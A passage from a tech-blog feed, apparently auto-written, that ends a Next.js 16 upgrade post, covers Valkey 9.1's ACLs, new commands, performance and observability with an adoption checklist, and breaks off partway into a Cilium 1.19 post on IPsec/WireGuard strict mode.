
10. ManoIT internal adoption checklist

#	Task	Owner	Done criteria
1	Runtime audit — find Node 18 services, upgrade to 20.9+	Platform	All services Node 20.9+/TS 5.1+
2	Apply codemod on dev branch, confirm build passes	Frontend	`next build` succeeds
3	Bulk-rename `middleware.ts` → `proxy.ts` PR	Frontend	auth/redirect e2e passes
4	Add `cacheLife` profiles to `revalidateTag` callsites	Service owners	Zero deprecation warnings
5	Check parallel-route slots for missing `default.js`	Frontend	Zero build errors
6	Review image policy — `qualities`/`minimumCacheTTL` regressions	Frontend	Zero visual regressions on key screens
7	Baseline Turbopack build time & bundle size	Platform	Before/after build-time report
8	Caching-redesign PoC — `cacheComponents` + `use cache` on key pages	Frontend lead	TTFB / cache hit-rate measured
9	React Compiler opt-in A/B — build time vs runtime re-renders	Frontend	Adoption decision doc
10	Standardize 16.2 AGENTS.md + browser log forwarding	DX	Reflected in new-repo template
11	staging load/perf regression test (Lighthouse, k6)	QA	Zero Core Web Vitals regression
12	Gradual prod rollout (canary → all) + rollback rehearsal	Platform	Zero-downtime deploy + rollback verified

11. Conclusion — a major release that delivers "predictable caching and fast defaults"

In one line, Next.js 16 is "the release that strips away implicit magic — making caching explicit, the bundler fast, and middleware honest." Cache Components and use cache turn caching, once a debugging black box, into an opt-in model where the compiler manages keys. Making Turbopack the default brings build and Fast Refresh acceleration to everyone as a zero-config default. Renaming to proxy.ts looks small but fixes the mental model that "this file is the network boundary in front of the cache," and the revalidateTag/updateTag/refresh split cleanly separates SWR, read-your-writes, and uncached-refresh intents. 16.2's AI-native turn signals that the framework now treats coding agents as first-class users alongside humans.

Three things to remember operationally. (1) Upgrade the runtime first — with Node 18 dropped, the runtime is always the first gate of a 16 upgrade. (2) Treat caching redesign as a separate milestone — a plain migration (keeping the default dynamic model) and adopting cacheComponents are different jobs; don't mix them in one PR. (3) Measure build-output regressions for the Turbopack switch — most things are compatible, but builds depending on custom Webpack plugins should keep a --webpack safety net and verify gradually during the transition. The shortest one-line recommendation: "This sprint, run the codemod on a dev branch to get the build passing, then merge the proxy.ts rename and the revalidateTag profile additions first."

ⓘ This article was researched and written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official Next.js 16 release blog (nextjs.org/blog/next-16, Oct 21 2025), the Next.js 16.2 AI Improvements blog (Mar 18 2026), the Next.js 16 upgrade guide, InfoQ's 16 release analysis, and LogRocket's 16 review as primary sources. API signatures, config options, performance figures, and flag names reflect the official docs as of the publish date (2026-05-30) and may change in later patches. Always verify against nextjs.org/docs and GitHub Releases before applying in production. Internal adoption examples are adapted from ManoIT's frontend team's operational procedures.

Originally published at ManoIT Tech Blog.

Valkey 9.1 Deep Dive — Database-Level ACLs, Lua-as-a-Module, and a New I/O Threading Model Hitting 2.1M RPS

daniel jeong — Fri, 29 May 2026 00:27:18 +0000

Valkey 9.1 Deep Dive — Database-Level ACLs, Lua-as-a-Module, and a New I/O Threading Model Hitting 2.1M RPS, Plus HGETDEL/MSETEX/CLUSTERSCAN Redefining the 2026 In-Memory Datastore Operations Standard

TL;DR

Valkey 9.1.0 (May 19, 2026) is the first minor release after the 9.0 GA, with 80+ contributors hardening security, observability, performance, efficiency, and tooling all at once.

Numbered database-level ACLs let you scope a user's permissions to specific databases (db=0,1), making single-cluster multi-tenant isolation practical.

Lua moved to a module (libvalkeylua.so): pure cache workloads can skip loading it entirely and remove the scripting engine from their attack surface.

A redesigned I/O threading model pushes a single server to 2.1M RPS (512-byte payloads, 9 IO threads, pipeline depth 10) and gives up to 17% more throughput.

New commands HGETDEL / MSETEX / CLUSTERSCAN, JSON logging (log-format json), main/IO thread usage metrics, and TLS auto-reload + SAN-URI mTLS round it out.

The Valkey community shipped Valkey 9.1.0 on May 19, 2026. Forked from Redis 7.2.4 under the Linux Foundation after the 2024 Redis license change (SSPL/RSALv2), Valkey crossed from "a Redis-compatible layer" into "a project with its own roadmap" at the 9.0 GA in October 2025. 9.1 builds on that foundation: 80+ contributors advanced security, observability, performance, efficiency, and tooling simultaneously. Compressed into one paragraph: (1) numbered database-level ACLs split per-tenant permissions at db granularity inside a single instance, (2) Lua scripting moved into its own module so you can turn it off entirely when unused, and (3) a new I/O threading model hit 2.1M RPS on a single server (512-byte payload, 9 IO threads, pipeline depth 10). Add (4) the HGETDEL/MSETEX/CLUSTERSCAN commands, (5) JSON logging plus main/IO thread usage metrics, and (6) TLS certificate auto-reload and SAN-URI mTLS. This article decomposes the root cause of each change from an operations standpoint, revisits the 9.0 foundation (Atomic Slot Migration, Hash Field Expiration, cluster-mode numbered DBs), and lays out the step-by-step upgrade, validation, and rollback playbook ManoIT applied to its internal cache/session clusters.

1. Why May 2026's Valkey 9.1 matters

Valkey's significance isn't a version number; it's the maturity the project has reached roughly two years after the fork. Right after the fork, the yardstick was "how Redis-compatible is it?" But once 9.0 added features not present in Redis OSS (Atomic Slot Migration, Hash Field Expiration, cluster-mode numbered DBs), the axis shifted to "the operational value of independent features." 9.1 continues that arc by concentrating on the two most operational areas: security and observability.

Date	Release / Event	Operational meaning
2024.03	Redis license change → Valkey fork (Redis 7.2.4 base)	BSD-3-Clause retained, Linux Foundation governance
2024.09	Valkey 8.0: multithreaded I/O	Per-core throughput gains begin
2025.04	Valkey 8.1: new hash table, I/O improvements	Lower memory overhead and latency
2025.10.21	Valkey 9.0 GA: Atomic Slot Migration, Hash Field Expiration, cluster numbered DBs, 1B RPS	Inflection beyond Redis compatibility
2026.05.19	Valkey 9.1.0: DB-level ACLs, Lua-as-a-module, new I/O threading (2.1M RPS), HGETDEL/MSETEX/CLUSTERSCAN, JSON logging	Security/observability/efficiency become operational defaults

The two operational messages of 9.1: (1) you can solve multi-tenant isolation at db granularity without adding instances — DB-level ACLs directly cut the cost of instance separation; and (2) observability is now provided directly by the core, without a sidecar — JSON logging and thread usage metrics absorb gaps you previously filled with exporters and log parsers.

2. Security — Database-Level ACLs, Lua-as-a-Module, TLS Improvements

In-memory datastores traditionally said "we're fast, but security belongs upstream (app/network policy)." 9.1 challenges that assumption by hardening the core itself.

2.1 Numbered database-level ACLs — the new multi-tenant isolation standard

Classic ACLs controlled which commands a user could run and which keys they could touch — but those rules applied to every database identically. Even if you split db 0 and db 5, permissions weren't split, so numbered DBs were hard to use as a multi-tenancy boundary. 9.1 adds a db= selector to scope a user's permissions to specific databases.

# Allow app-user only on db 0 and 1
> ACL SETUSER app-user on >secretpass +@all ~* db=0,1
OK

# After auth, db 0 works
> SELECT 0
OK
> SET mykey "hello"
OK

# db 2 is blocked
> SELECT 2
(error) NOPERM No permissions to access database

The operational payoff is large. The pattern of "one instance (or cluster) per tenant for isolation" can become per-tenant db + per-db ACL inside a single cluster when combined with 9.0's cluster-mode numbered DBs. Fewer instances → less memory overhead and operational burden. Caveat: numbered DBs are logical, not physical isolation, so for strongly regulated data (PII, payments) keep instance separation as well.
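
As a rough illustration of the "per-tenant db + per-db ACL" pattern, the sketch below renders one ACL SETUSER line per tenant and refuses to hand the same database to two tenants. It assumes the `db=` selector syntax shown in the example above; the tenant names, the `build_acl_commands` helper, and the `CHANGE_ME` password placeholder are hypothetical.

```python
from typing import Dict, List


def build_acl_commands(tenant_dbs: Dict[str, List[int]]) -> List[str]:
    """Render one ACL SETUSER line per tenant, refusing shared databases."""
    owner_of: Dict[int, str] = {}
    commands: List[str] = []
    for user in sorted(tenant_dbs):
        dbs = sorted(set(tenant_dbs[user]))
        if not dbs:
            raise ValueError(f"tenant {user!r} has no database assigned")
        for db in dbs:
            if db in owner_of:
                raise ValueError(f"db {db} is shared by {owner_of[db]!r} and {user!r}")
            owner_of[db] = user
        db_list = ",".join(str(db) for db in dbs)
        # CHANGE_ME is a placeholder; load real passwords from a secret store.
        commands.append(f"ACL SETUSER {user} on >CHANGE_ME +@all ~* db={db_list}")
    return commands


# Hypothetical tenant-to-database mapping
for line in build_acl_commands({"tenant-a": [0, 1], "tenant-b": [5]}):
    print(line)
```

Generating the commands from a single mapping keeps the tenant↔db↔ACL relationship reviewable in one place, which is the same artifact the adoption checklist later asks for.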

2.2 Lua scripting engine moved to a module — attack surface reduction

9.1 extracts the Lua scripting engine from the core server into its own module (libvalkeylua.so). Running arbitrary Lua via EVAL/EVALSHA is powerful but also a well-known attack vector (sandbox escape, resource exhaustion). The point of modularization is "don't load it if you don't need it." A pure cache workload with no scripting can leave the Lua module unloaded and remove the scripting attack surface entirely. Check which scripting engines are loaded via the new Scripting Engines section of INFO.

> INFO scripting_engines
# Scripting Engines
engine_lua:loaded=1,libname=libvalkeylua.so

2.3 TLS auto-reload and SAN-URI-based mTLS

9.1 directly tackles two chronic TLS operations pains — "an expired cert nobody noticed caused an outage" and "rotating certs requires a restart."

Improvement	Through 9.0	9.1
Cert expiry visibility	External monitoring only	`INFO` exposes TLS cert expiration dates
Cert rotation	Restart required (downtime)	Background auto-reload (zero downtime)
mTLS identity	CN-based	SAN-URI-based authentication

SAN-URI authentication integrates directly with workload-identity systems like SPIFFE/SPIRE, simplifying mTLS in service-mesh / zero-trust environments.

3. New Commands — HGETDEL / MSETEX / CLUSTERSCAN

9.1 absorbed "common patterns that used to need multiple round trips or a transaction" into single atomic commands.

3.1 HGETDEL — atomically get and delete hash fields

For queue patterns (read data and remove it immediately), you previously had to wrap HGET + HDEL in MULTI. HGETDEL does it in one shot.

> HSET job:42 status "pending" payload '{"action":"send_email"}' retries "3"
(integer) 3
> HGETDEL job:42 FIELDS 2 status payload
1) "pending"
2) "{\"action\":\"send_email\"}"
> HGETALL job:42
1) "retries"
2) "3"
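
To make the get-and-delete semantics concrete, here is a toy in-memory model in Python. It is not Valkey code: the `hgetdel` function and the dict-based store are illustrative only, and two behaviors are assumptions rather than something the transcript above confirms (missing fields yield `None`, and a hash that becomes empty disappears).

```python
from typing import Dict, List, Optional


def hgetdel(store: Dict[str, Dict[str, str]], key: str, fields: List[str]) -> List[Optional[str]]:
    """Toy model: return the requested hash fields and remove them in one step."""
    fields_map = store.get(key, {})
    # dict.pop() reads and removes together; a missing field yields None (assumed).
    values = [fields_map.pop(field, None) for field in fields]
    if key in store and not store[key]:
        del store[key]  # assumption: an emptied hash key is removed
    return values


store = {"job:42": {"status": "pending", "payload": '{"action":"send_email"}', "retries": "3"}}
print(hgetdel(store, "job:42", ["status", "payload"]))
print(store["job:42"])
```

The point of the single command is that no other client can observe the state between the read and the delete, which is what the MULTI wrapper used to guarantee.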

3.2 MSETEX — set multiple keys with a shared TTL

Setting many keys with the same TTL used to require multiple SETEX calls or a SET+EXPIRE pipeline. MSETEX cuts round trips and supports idempotent sets via NX.

# Set 3 session keys, all expiring in 3600s
> MSETEX 3 session:abc "user:1" session:def "user:2" session:ghi "user:3" EX 3600
OK
> TTL session:abc
(integer) 3600

# NX: only set keys that don't already exist
> MSETEX 2 session:abc "user:99" session:xyz "user:4" NX EX 3600
OK
> GET session:abc
"user:1"

3.3 CLUSTERSCAN — cluster-wide key scanning

Iterating all keys in a cluster previously meant clients independently SCAN-ing each node and merging results. CLUSTERSCAN offers a single interface to traverse all nodes, with MATCH/TYPE/SLOT filters.

# Iterate all cluster keys (repeat until cursor returns 0)
> CLUSTERSCAN 0
1) "3"
2) 1) "user:1001"
   2) "user:1002"
   3) "session:abc"
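
The "repeat until cursor returns 0" loop can be sketched as follows. The `scan_page` callable stands in for whatever client call issues `CLUSTERSCAN <cursor>`; it and the fake pages are hypothetical, and the reply shape (next cursor plus a list of keys) is taken from the transcript above.

```python
from typing import Callable, Dict, Iterator, List, Tuple

ScanPage = Tuple[str, List[str]]  # (next_cursor, keys)


def scan_all(scan_page: Callable[[str], ScanPage]) -> Iterator[str]:
    """Yield every key by following cursors until the server hands back "0"."""
    cursor = "0"
    while True:
        cursor, keys = scan_page(cursor)
        yield from keys
        if cursor == "0":
            break


# Made-up pages standing in for real server replies.
FAKE_PAGES: Dict[str, ScanPage] = {
    "0": ("3", ["user:1001", "user:1002"]),
    "3": ("0", ["session:abc"]),
}

print(list(scan_all(lambda cursor: FAKE_PAGES[cursor])))
```

If CLUSTERSCAN follows the usual SCAN-family guarantees (an assumption here), a key may be returned more than once, so callers that need exact sets should deduplicate on the client side.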

# Filter by pattern
> CLUSTERSCAN 0 MATCH "session:*"
# Filter by type
> CLUSTERSCAN 0 TYPE hash
# Scan a specific slot
> CLUSTERSCAN 0 SLOT 7638

4. Performance — New I/O Threading Model Hits 2.1M RPS on a Single Server

9.1 pushes single-server throughput to 2.1M RPS under 512-byte payloads, 9 IO threads, pipeline depth 10. The core change is a redesigned inter-IO-thread communication model.

Improvement	Detail	Effect
New I/O threading model	Redesigned IO thread communication	Up to 17% higher throughput across workloads
Faster stream ops	`XRANGE`/`XREVRANGE` hot-path optimization	Up to 30% faster
Higher-throughput GETs	Raised string embedding size threshold	Up to 30% higher for string GET
Faster sorted-set queries	Skiplist query processing improvements	`ZRANGEBYSCORE`/`ZRANGEBYLEX` faster
Cached COMMAND responses	`COMMAND` responses are cached	Shorter client-init connection time
Hardware clock by default	Less time-syscall overhead	Up to 3% overall GET/SET improvement

Enabling the hardware clock by default looks minor but is global: it swaps the time lookup that every command makes from a syscall to a hardware counter. On virtualized or otherwise unusual environments, validate monotonic-clock behavior before rolling out.

5. Efficiency — Memory Reduction and Rehashing / Bulk-Delete Optimization

As important as throughput is "the same data in less memory." 9.1 delivers meaningful savings on small strings and sorted sets.

Optimization	Target	Effect
String memory reduction	Strings < 128 bytes (internal pointer optimization)	Up to 20% less memory
Sorted-set memory reduction	Skiplist optimization	Up to 10% less memory
Rehashing performance	Internal hash-table rehashing on keyspace growth	Reduced latency impact during rehashing
Bulk delete	Pause resizing during `SREM`/`ZREM`/`HDEL`	Removes needless rehashing → faster bulk deletes
Replica creation	Reuse received RDB as AOF base when AOF enabled	No initial snapshot regeneration

"20% savings on sub-128-byte strings" is very tangible for services that store huge numbers of small strings — session tokens, flags, short cache values. A cache holding tens of millions of small keys cuts memory cost from the upgrade alone.

6. Observability — JSON Logging and Thread Usage Metrics

A long-standing Valkey/Redis ops weakness was "logs are human-readable plain text, awkward for observability tools to parse." 9.1 emits structured logs directly from the core via log-format json.

# valkey.conf
log-format json

Output is one JSON object per line — Loki/Elastic/CloudWatch can parse it immediately without custom grok patterns.

{"pid":14500,"role":"primary","timestamp":"14 May 2026 14:13:02.921","level":"notice","message":"oO0OoO0OoO0Oo Valkey is starting oO0OoO0OoO0Oo"}
{"pid":14500,"role":"primary","timestamp":"14 May 2026 14:13:02.928","level":"warning","message":"WARNING: The TCP backlog setting of 511 cannot be enforced..."}
{"pid":14500,"role":"primary","timestamp":"14 May 2026 14:13:02.930","level":"notice","message":"Ready to accept connections tcp"}
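
A minimal sketch of consuming these lines without grok patterns, using only the Python standard library. The field names and timestamp format are taken from the sample output above; the `warnings_only` helper and the stray non-JSON line are illustrative.

```python
import json
from datetime import datetime
from typing import Any, Dict, Iterable, List

LINES = [
    '{"pid":14500,"role":"primary","timestamp":"14 May 2026 14:13:02.921","level":"notice","message":"oO0OoO0OoO0Oo Valkey is starting oO0OoO0OoO0Oo"}',
    '{"pid":14500,"role":"primary","timestamp":"14 May 2026 14:13:02.928","level":"warning","message":"WARNING: The TCP backlog setting of 511 cannot be enforced..."}',
    "a stray plain-text line",
]


def warnings_only(lines: Iterable[str]) -> List[Dict[str, Any]]:
    """Parse one JSON object per line and keep only warning-level events."""
    events = []
    for raw in lines:
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # tolerate lines that are not JSON
        if isinstance(event, dict) and event.get("level") == "warning":
            # Timestamp format as it appears in the sample output.
            event["ts"] = datetime.strptime(event["timestamp"], "%d %b %Y %H:%M:%S.%f")
            events.append(event)
    return events


for event in warnings_only(LINES):
    print(event["ts"].isoformat(), event["message"])
```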

The other key item is main/IO thread usage metrics. Valkey's threads busy-loop while waiting for work, so CPU can appear near 100% even when relatively idle — plain CPU metrics couldn't reveal true load. 9.1 adds cumulative usage metrics for the main and IO threads so you can measure "how busy is it really?" and tune accordingly. It's a direct basis for deciding whether to add IO threads (scale up).
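
Because the new metrics are cumulative, "how busy is it really?" comes from the difference between two samples divided by the elapsed time. The sketch below shows that arithmetic; the metric's real field names and units are not shown in this article, so the microsecond unit and the `busy_fraction` helper are assumptions.

```python
def busy_fraction(prev_busy_us: int, curr_busy_us: int, elapsed_us: int) -> float:
    """Fraction of the sampling interval a thread spent doing real work."""
    if elapsed_us <= 0:
        raise ValueError("elapsed_us must be positive")
    delta = curr_busy_us - prev_busy_us
    if delta < 0:
        # Counter went backwards: assume a restart reset it to zero.
        delta = curr_busy_us
    return min(delta / elapsed_us, 1.0)


# Two hypothetical samples taken 10 seconds apart.
print(f"{busy_fraction(1_000_000, 4_000_000, 10_000_000):.0%}")
```

A thread that shows near 100% CPU in `top` but a low busy fraction here is mostly spinning while idle, which argues against adding IO threads.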

7. Revisiting the 9.0 Foundation — Atomic Slot Migration, Hash Field Expiration, Cluster Numbered DBs

To use 9.1 well you must know the 9.0 foundation beneath it. The three pillars of 9.0 (2025-10-21) tie straight into operational stability.

7.1 Atomic Slot Migration — from key-by-key to slot-by-slot

Pre-9.0 cluster resharding was key-by-key move-then-delete. If a client touched a key mid-migration, it didn't know which node held it, adding hops; in multi-key ops with keys split across two nodes, the client had to retry; and a huge collection key could exceed the target node's input buffer and block the migration outright. 9.0 atomically moves an entire slot (of 16,384) in AOF format. The source node keeps all keys until the slot migration fully completes, so redirects, retries, and giant-key blocking disappear structurally. 9.1's valkey-cli uses this directly via the --cluster-use-atomic-slot-migration flag on --cluster rebalance/--cluster reshard.
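
For readers who want to see what "a slot" is, the sketch below computes the slot for a key using the key-to-slot mapping Valkey inherits from Redis Cluster: CRC16 (XMODEM variant) of the key modulo 16,384, hashing only the `{hash tag}` when a non-empty one is present. The `key_slot` helper name is illustrative.

```python
import binascii


def key_slot(key: str) -> int:
    """Map a key to one of the 16,384 cluster hash slots."""
    data = key.encode()
    start = data.find(b"{")
    if start != -1:
        end = data.find(b"}", start + 1)
        if end != -1 and end != start + 1:
            # Only the non-empty text between the first "{" and the next "}" is hashed.
            data = data[start + 1:end]
    # crc_hqx with an initial value of 0 is CRC16 with polynomial 0x1021 (XMODEM).
    return binascii.crc_hqx(data, 0) % 16384


print(key_slot("foo"))
print(key_slot("{user1000}.following") == key_slot("{user1000}.followers"))
```

Keys that share a hash tag land in the same slot, so they always move together when a slot migrates atomically.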

7.2 Hash Field Expiration — per-field TTL

Hashes bundle many fields under one key, but pre-9.0 expiry was all-or-nothing at the key level. Expiring only some fields required multi-key hacks, adding complexity and memory. 9.0 added a per-field TTL command family: HEXPIRE, HPEXPIRE, HTTL, HGETEX, HSETEX, HPERSIST, and more. Combined with 9.1's HGETDEL, hash-based job queues and session stores become far cleaner.

7.3 Other 9.0 improvements

9.0 also delivered: 1B RPS on a 2,000-node cluster (large-cluster resilience), pipeline memory prefetch (up to 40% higher throughput), zero-copy responses (up to 20% higher throughput), Multipath TCP (up to 25% lower latency), SIMD for BITCOUNT and HyperLogLog (up to 200% higher throughput), polygon-based geospatial queries, conditional delete DELIFEQ, CLIENT LIST filtering, and the un-deprecation of 25 previously deprecated commands. If 9.0 was "a leap in performance and features," 9.1 is "the security/observability/efficiency finish on top."

8. Operational Decisions — Upgrade / Migration Flow

Below is the 9.1 adoption decision flow used by ManoIT's platform team.

flowchart TD
    A[Current in-memory store] --> B{Engine?}
    B -->|Redis 7.2 or older OSS| C[Evaluate drop-in migration<br/>to BSD-3 Valkey 9.1]
    B -->|Valkey 8.x| D[9.1 minor upgrade]
    B -->|Redis 7.4+ SSPL| E[Decide after license policy review]
    C --> F{Use scripting?}
    D --> F
    F -->|No| G[Don't load Lua module<br/>shrink attack surface]
    F -->|Yes| H[Keep Lua module loaded]
    G --> I{Multi-tenant?}
    H --> I
    I -->|Yes| J[Consolidate instances via<br/>numbered DBs + per-db ACLs]
    I -->|No| K[Single-db operation]
    J --> L[Wire JSON logging + thread metrics<br/>into observability pipeline]
    K --> L
    L --> M[Validate in staging 2 weeks → gradual prod rollout]

9. ManoIT Internal Adoption Checklist

The checklist below turns the above into an internal operations procedure. ManoIT runs cache/session/ranking clusters in three tiers (dev/stage/prod) and validates even minor releases for two weeks in staging before prod.

#	Item	Owner	Done criteria
1	Inventory engine/version across all clusters (incl. Redis/Valkey mix)	Platform	Version matrix PR
2	Audit Lua scripting usage — trace `EVAL`/`EVALSHA` calls	Service owners	Identify scripting-free clusters
3	Upgrade dev cluster to 9.1 (keep Lua loaded, default config)	Platform	`INFO server` = 9.1.0
4	Client compatibility regression in dev — verify new commands/response changes	Service owners	Client SDK compatibility report
5	Design numbered DBs + per-db ACLs on multi-tenant candidate clusters	Platform	Tenant↔db↔ACL mapping doc
6	Drop Lua module on scripting-free clusters	Platform + Security	`INFO scripting_engines` = empty
7	Enable JSON logging (`log-format json`) → wire to Loki	Observability	Structured log collection + dashboard
8	Expose main/IO thread usage metrics to Prometheus + alarms	Observability	IO-thread-saturation alarm fire/resolve test
9	Validate TLS auto-reload + cert-expiry metric, pilot SAN-URI mTLS	Security	Zero-downtime cert rotation verified
10	Staging 9.1 upgrade + load test (`valkey-benchmark --warmup --duration`)	Platform	Zero throughput/latency regression report
11	Standardize `--cluster-use-atomic-slot-migration` on resharding	Platform	Resharding runbook updated
12	Gradual prod upgrade (replica → primary, slot-level verification)	Platform	All prod nodes 9.1.0 + zero-downtime availability
13	Measure real memory savings post-upgrade (small-string / sorted-set heavy clusters)	Platform	Before/after `used_memory` comparison
14	Validate rollback — 8.x downgrade path when new 9.1 commands are unused	Platform	Rollback rehearsal passed

10. Conclusion — A Minor Release That Made Security, Observability, and Efficiency the Operational Default

Sum up 9.1 in one line: "on top of the performance and feature leap 9.0 laid down, it adds the operational finish: security, observability, and efficiency." Numbered DB-level ACLs open a path to multi-tenant isolation at db granularity without adding instances; Lua-as-a-module applies the zero-trust principle "turn off what you don't use" at the core. The new I/O threading model hit 2.1M RPS on a single server, and up to 20% memory savings on small strings cut cache cost directly. JSON logging and thread usage metrics absorb the observability gap you previously filled with sidecars and exporters, while HGETDEL/MSETEX/CLUSTERSCAN collapse common multi-round-trip and transaction patterns into single commands.

Three things to remember operationally. (1) Audit Lua usage first — dropping the module shrinks the attack surface, but a careless removal breaks features that relied on EVAL. (2) Remember numbered DBs are logical isolation — per-db ACLs are powerful but not physical isolation, so keep instance separation for regulated data. (3) Don't skip staging validation, even for a minor release — global-behavior changes like the hardware clock default and new I/O threading are included, so pre-validate on special virtualization environments. The shortest one-line recommendation in this article: "Upgrade dev to 9.1 this week, and start the security PR to drop the Lua module on your scripting-free clusters first."

ℹ️ This article was written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official Valkey 9.1.0 release blog (valkey.io, May 19, 2026), the Valkey 9.0 GA blog (Oct 21, 2025), the Linux Foundation 9.1 release announcement (PRNewswire), Phoronix's 9.1 review, and the valkey-io/valkey GitHub release notes as primary sources. Command syntax, performance figures, and flag names reflect official docs as of publication (2026-05-29) and may change in future patches. Verify current status at valkey.io/commands and GitHub Releases before applying to production. The internal adoption example is adapted from ManoIT platform team's operational procedures.

Originally published at ManoIT Tech Blog.

Cilium 1.19 Deep Dive — 10-Year Anniversary: IPsec/WireGuard Strict Mode, Ztunnel Beta, Policy-Default-Local-Cluster, Multi-Pool IPAM Stable

daniel jeong — Thu, 28 May 2026 00:32:04 +0000

Cilium 1.19 Deep Dive — 10-Year Anniversary Release: IPsec/WireGuard Strict Mode, Ztunnel Transparent Encryption Beta, Policy-Default-Local-Cluster, Multi-Pool IPAM Stable, and Hubble Drop Tagging Redefining the 2026 eBPF Networking, Security, and Observability Standard

TL;DR

Cilium v1.19 (May 13, 2026) is the 10-year anniversary release and flips multiple defaults toward operational safety.

IPsec / WireGuard strict mode drops unencrypted traffic by default, ending best-effort encryption gaps.

ClusterMesh policy-default-local-cluster is now the default — audit your existing NetworkPolicies before upgrading or you will silently cut multi-cluster traffic.

Ztunnel Transparent Encryption (Beta) brings sidecarless workload-identity mTLS to Cilium, interoperable with Istio Ambient.

Multi-Pool IPAM graduates to Stable, Hubble adds drop policy tagging + encrypted-flow filters + Trace IP Options, and Network Policy denials can now return ICMPv4 Destination Unreachable to skip the 30-second TCP retry loop.

Cilium hit a clean ten years since its first commit, and v1.19 lands as the anniversary release. v1.19.0 dropped in mid-May 2026 and patches rolled to v1.19.4 within two weeks. There is no single flagship feature on the cover; instead, six axes evolve simultaneously to prove the promise of "an eBPF dataplane you can actually operate quarter after quarter." (1) Strict modes for IPsec and WireGuard turn node-to-node encryption from best-effort into a hard requirement. (2) Ztunnel Transparent Encryption lands as a beta integration, opening a sidecarless workload-identity encryption path next to the node-level encryption story. (3) ClusterMesh policy-default-local-cluster becomes the new default, structurally blocking the "I wrote a local policy that quietly fanned out across the mesh" class of incidents. (4) Multi-Pool IPAM graduates from Beta to Stable and now works with IPsec and direct routing. (5) Hubble adds drop event policy tagging, encrypted-flow filters, and Trace IP Options so "why was this packet dropped?" is answerable in one command. (6) Network Policy denials can now return ICMPv4 Destination Unreachable, ending the dumb 30-second TCP retry loop. This article decomposes the root cause of each of the six changes at the eBPF datapath / policy compilation / CRD schema level and lays out the 16-item upgrade, observation, and rollback checklist ManoIT applied across three internal Kubernetes clusters (prod / stage / dev).

1. Why May 2026's v1.19 is an inflection point for Cilium

Cilium started in April 2016 when Thomas Graf rewrote the Kubernetes dataplane in eBPF instead of iptables. v1.0 in 2018, CNCF Sandbox in 2019, Incubating in 2021, and Graduated in October 2023 — by now Cilium is the dataplane behind or recommended by GKE Dataplane v2, EKS Anywhere, OpenShift, Talos Linux, K3s, and most other major Kubernetes distributions. v1.19 is the inflection point where the 10-year anniversary symbolism meets a deliberate maintainer pivot: "operational safety nets become the default."

Date	Event	Operational meaning
2016.04	Cilium first commit (Thomas Graf)	eBPF-based K8s dataplane launches
2018.04	v1.0 — Production-ready	"L7 visibility + identity-based" model settles
2019.06	CNCF Sandbox accepted	Community governance stage 1
2021.10	CNCF Incubating	Hubble · ClusterMesh stabilization era
2023.10	CNCF Graduated	Enterprise adoption guidelines formalized
2024.04	v1.16 — Gateway API Beta, Multi-Pool IPAM Beta	Service mesh + multi-CIDR operations activated
2025.05	v1.17 — Gateway API GA, BGPv2 Stable	Accelerated Ingress NGINX retirement flow
2025.10	v1.18 — ClusterMesh API server v2, KVStoreMesh stable	Simplified large-scale multi-cluster control plane
2026.05.13	v1.19 — Strict Mode, Ztunnel Beta, policy-default-local-cluster, Multi-Pool IPAM Stable, Hubble drop tagging, ICMP friendly deny	Operational safety nets become the default
2026.05.27	v1.19.4 patch release	Rapid 1.19.x patch stabilization in progress

Two messages matter for operators. (1) "Default changes are the biggest changes." — ClusterMesh's policy-default-local-cluster flipping from false to true is not a feature addition; it is the default safety posture of multi-cluster policy flipping. (2) "Strict mode is the fastest path through a compliance audit." — Once IPsec or WireGuard is in strict mode, unencrypted traffic is dropped on the wire, so the "we encrypted, but some packets leaked in plaintext" audit finding disappears structurally.

2. IPsec/WireGuard Strict Mode — best-effort encryption becomes hard requirement

Strict mode gets the longest section in the v1.19 release notes. Cilium's transparent encryption has supported IPsec since v1.4 and WireGuard since v1.10. But both modes were best-effort: "encrypt where we can, fall back to plaintext when peer keys aren't established or the protocol can't negotiate." That fallback was the most common finding in security audits.

2.1 Three gaps of the best-effort era

Scenario	v1.18 behavior	Audit verdict
New node joins cluster, key exchange still in progress	Plaintext until key negotiation completes, then encryption	"Plaintext window exists" finding
WireGuard peer key missing on a discovered node	Plaintext fallback	"Cannot enforce encryption" finding
IPsec XFRM policy partially expired (SPI rotation)	Plaintext fallback during renegotiation	"Plaintext traffic visible in audit log" finding

2.2 v1.19 fix — strict mode drops unencrypted traffic

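v1.19 adds encryption.strictMode to both IPsec and WireGuard. Once it is enabled, traffic inside the configured CIDR that cannot be encrypted is dropped instead of falling back to plaintext. The Helm values below enable it: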

# helm/cilium-values.yaml — IPsec strict mode
# WARNING: Enable only after keys are distributed to every node.
# Partial rollout will drop plaintext and cut communication.
encryption:
  enabled: true
  type: ipsec
  ipsec:
    interface: ""
    keyFile: keys
    mountPath: /etc/ipsec
  strictMode:
    enabled: true                # v1.19 new — best-effort -> hard requirement
    cidr: "10.0.0.0/8"           # CIDR strict applies to (usually covers PodCIDR)
    allowRemoteNodeIdentities: false   # new nodes without keys are dropped immediately
nodeinit:
  enabled: true

# helm/cilium-values.yaml — WireGuard strict mode
encryption:
  enabled: true
  type: wireguard
  nodeEncryption: true
  wireguard:
    persistentKeepalive: "0s"
  strictMode:
    enabled: true                # v1.19 new
    cidr: "10.0.0.0/8"
    allowRemoteNodeIdentities: false

# Apply the values, then verify
helm upgrade cilium cilium/cilium \
  --version 1.19.4 \
  --namespace kube-system \
  -f helm/cilium-values.yaml \
  --reuse-values

# Per-node strict status
kubectl -n kube-system exec -it ds/cilium -- cilium status --verbose | grep -A 3 Encryption
# Encryption:               Wireguard [strict]
# Strict mode CIDR:         10.0.0.0/8
# Allowed remote identities: 0
# Unencrypted drops (last 1m): 0

# Intentional plaintext blocking check
kubectl exec -it test-pod -- ping -c 3 unencrypted-peer-ip
# PING ... 100% packet loss   ← strict is doing its job

2.3 Operational rollout — 4-step gradient to avoid cluster-wide outage

Strict mode, if flipped at the wrong time, instantly takes the cluster offline. ManoIT's internal standard is a 4-step gradient:

Step	Action	Verification	Rollback trigger
1	Distribute keyFile to every node, restart cilium in plaintext mode	`cilium status` reports keys OK on every node	If any single node lacks keys, abort
2	Set `strictMode.enabled=true` with `allowRemoteNodeIdentities=true`	Hubble drop counters unchanged	Drops appear → flip back to false immediately
